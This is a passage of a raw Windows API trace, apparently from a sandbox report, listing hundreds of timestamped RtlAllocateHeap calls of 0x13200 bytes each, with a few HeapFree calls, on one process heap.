[0193.257] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21ee410 [0193.258] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2210080 [0193.459] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2223290 [0193.460] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22364a0 [0193.460] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22496b0 [0193.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x225c8c0 [0193.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x226fad0 [0193.462] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2282ce0 [0193.462] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2295ef0 [0193.463] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22a9100 [0193.463] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22bc310 [0193.464] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22cf520 [0193.464] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22e2730 [0193.483] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x22f5940 [0193.484] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2308b50 [0193.484] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x231bd60 [0193.485] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x232ef70 [0193.486] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2342180 [0193.486] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2f0) returned 0x568b20 [0193.486] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0193.486] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2355390 [0193.487] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23685a0 [0193.487] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x237b7b0 [0193.488] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x238e9c0 [0193.488] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23a1bd0 [0193.488] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23b4de0 [0193.489] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23c7ff0 [0193.490] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23db200 [0193.490] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x23ee410 [0193.491] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2401620 [0193.491] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2414830 [0193.492] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2427a40 [0193.492] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x243ac50 [0193.709] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x244de60 [0193.710] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2461070 [0193.710] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2474280 [0193.711] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2487490 [0193.712] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x249a6a0 [0193.712] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24ad8b0 [0193.713] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24c0ac0 [0193.713] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24d3cd0 [0193.714] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24e6ee0 [0193.714] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x24fa0f0 [0193.715] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x250d300 [0193.716] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2520510 [0193.716] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2533720 [0193.717] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2546930 [0193.717] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2559b40 [0193.717] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x256cd50 [0193.718] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x257ff60 [0193.718] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2593170 [0193.719] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x468) returned 0x57c600 [0193.719] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b20 | out: hHeap=0x550000) returned 1 [0193.719] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25a6380 [0193.720] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25b9590 [0193.720] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25cc7a0 [0193.721] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25df9b0 [0193.722] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x25f2bc0 [0193.722] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2610080 [0193.724] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2623290 [0193.725] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26364a0 [0193.725] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26496b0 [0193.726] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x265c8c0 [0193.727] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x266fad0 [0193.727] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2682ce0 [0193.728] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2695ef0 [0193.729] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26a9100 [0193.729] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26bc310 [0193.730] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26cf520 [0193.731] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26e2730 [0193.731] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x26f5940 [0193.732] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2708b50 [0193.732] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x271bd60 [0193.733] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x272ef70 [0193.734] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2742180 [0193.734] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2755390 [0193.734] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27685a0 [0193.735] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x277b7b0 [0193.736] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x278e9c0 [0193.736] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27a1bd0 [0193.736] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27b4de0 [0193.737] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27c7ff0 [0193.737] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27db200 [0193.738] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x27ee410 [0193.739] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2801620 [0193.740] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2814830 [0193.740] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2827a40 [0193.741] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x283ac50 [0193.742] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x284de60 [0193.743] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2861070 [0193.743] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2874280 [0193.744] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2887490 [0193.989] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x289a6a0 [0193.990] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28ad8b0 [0193.990] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28c0ac0 [0193.991] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28d3cd0 [0193.992] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28e6ee0 [0193.992] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x28fa0f0 [0193.993] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x290d300 [0193.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2920510 [0193.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x698) returned 0x568920 [0193.994] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57c600 | out: hHeap=0x550000) returned 1 [0193.994] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2933720 [0193.995] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2946930 [0193.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2959b40 [0193.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x296cd50 [0193.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x297ff60 [0193.997] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2993170 [0193.998] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29a6380 [0193.998] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29b9590 [0193.999] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29cc7a0 [0193.999] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29df9b0 [0194.000] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x29f2bc0 [0194.001] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a05dd0 [0194.002] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a18fe0 [0194.002] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a2c1f0 [0194.003] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a3f400 [0194.004] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a52610 [0194.004] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a65820 [0194.005] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a78a30 [0194.005] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a8bc40 [0194.006] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2a9ee50 [0194.007] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ab2060 [0194.007] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ac5270 [0194.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ad8480 [0194.008] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2aeb690 [0194.009] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2afe8a0 [0194.009] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b11ab0 [0194.009] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b24cc0 [0194.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b37ed0 [0194.010] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b4b0e0 [0194.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b5e2f0 [0194.011] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b71500 [0194.012] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b84710 [0194.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2b97920 [0194.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2baab30 [0194.014] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bbdd40 [0194.014] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bd0f50 [0194.015] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2be4160 [0194.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2bf7370 [0194.016] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c0a580 [0194.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c1d790 [0194.017] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c309a0 [0194.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c43bb0 [0194.018] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c56dc0 [0194.019] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c69fd0 [0194.019] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c7d1e0 [0194.020] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2c903f0 [0194.020] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ca3600 [0194.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cb6810 [0194.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cc9a20 [0194.021] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cdcc30 [0194.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2cefe40 [0194.022] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d03050 [0194.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d16260 [0194.023] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d29470 [0194.024] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d3c680 [0194.024] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d4f890 [0194.236] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d62aa0 [0194.237] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d75cb0 [0194.237] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d88ec0 [0194.238] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2d9c0d0 [0194.239] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2daf2e0 [0194.239] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2dc24f0 [0194.239] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2dd5700 [0194.240] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2de8910 [0194.241] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e10080 [0194.243] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e23290 [0194.244] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e364a0 [0194.244] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e496b0 [0194.244] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e5c8c0 [0194.245] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e6fad0 [0194.245] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9e0) returned 0x57c600 [0194.245] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568920 | out: hHeap=0x550000) returned 1 [0194.245] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e82ce0 [0194.246] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2e95ef0 [0194.246] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ea9100 [0194.247] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ebc310 [0194.247] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ecf520 [0194.248] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ee2730 [0194.248] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2ef5940 [0194.249] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f08b50 [0194.250] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f1bd60 [0194.250] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f2ef70 [0194.251] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f42180 [0194.252] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f55390 [0194.252] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f685a0 [0194.252] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f7b7b0 [0194.253] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2f8e9c0 [0194.253] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fa1bd0 [0194.253] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fb4de0 [0194.254] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fc7ff0 [0194.254] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fdb200 [0194.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2fee410 [0194.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3001620 [0194.256] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3014830 [0194.256] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3027a40 [0194.256] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x303ac50 [0194.257] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x304de60 [0194.257] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3061070 [0194.258] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3074280 [0194.258] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3087490 [0194.259] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x309a6a0 [0194.260] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x30ad8b0 [0194.260] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x30c0ac0 [0194.261] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x30d3cd0 [0194.261] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x30e6ee0 [0194.261] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x30fa0f0 [0194.262] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x310d300 [0194.262] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3120510 [0194.263] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3133720 [0194.263] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3146930 [0194.263] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3159b40 [0194.264] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x316cd50 [0194.264] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x317ff60 [0194.264] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3193170 [0194.265] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x31a6380 [0194.265] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x31b9590 [0194.266] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x31cc7a0 [0194.266] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x31df9b0 [0194.266] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x31f2bc0 [0194.267] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3205dd0 [0194.267] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3218fe0 [0194.268] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x322c1f0 [0194.268] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x323f400 [0194.269] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3252610 [0194.269] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3265820 [0194.270] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3278a30 [0194.270] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x328bc40 [0194.271] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x329ee50 [0194.271] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x32b2060 [0194.272] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x32c5270 [0194.439] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x32d8480 [0194.440] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x32eb690 [0194.440] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x32fe8a0 [0194.441] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3311ab0 [0194.441] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3324cc0 [0194.442] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3337ed0 [0194.442] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x334b0e0 [0194.443] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x335e2f0 [0194.444] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3371500 [0194.444] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3384710 [0194.445] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3397920 [0194.446] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x33aab30 [0194.446] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x33bdd40 [0194.447] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x33d0f50 [0194.447] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x33e4160 [0194.448] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x33f7370 [0194.449] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x340a580 [0194.449] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x341d790 [0194.450] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34309a0 [0194.451] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3443bb0 [0194.451] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3456dc0 [0194.452] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3469fd0 [0194.453] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x347d1e0 [0194.453] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34903f0 [0194.454] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34a3600 [0194.454] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34b6810 [0194.455] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34c9a20 [0194.455] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34dcc30 [0194.455] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x34efe40 [0194.456] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3503050 [0194.456] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3516260 [0194.457] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3529470 [0194.458] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x353c680 [0194.458] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x354f890 [0194.459] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3562aa0 [0194.459] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3575cb0 [0194.460] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x3588ec0 [0194.461] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, 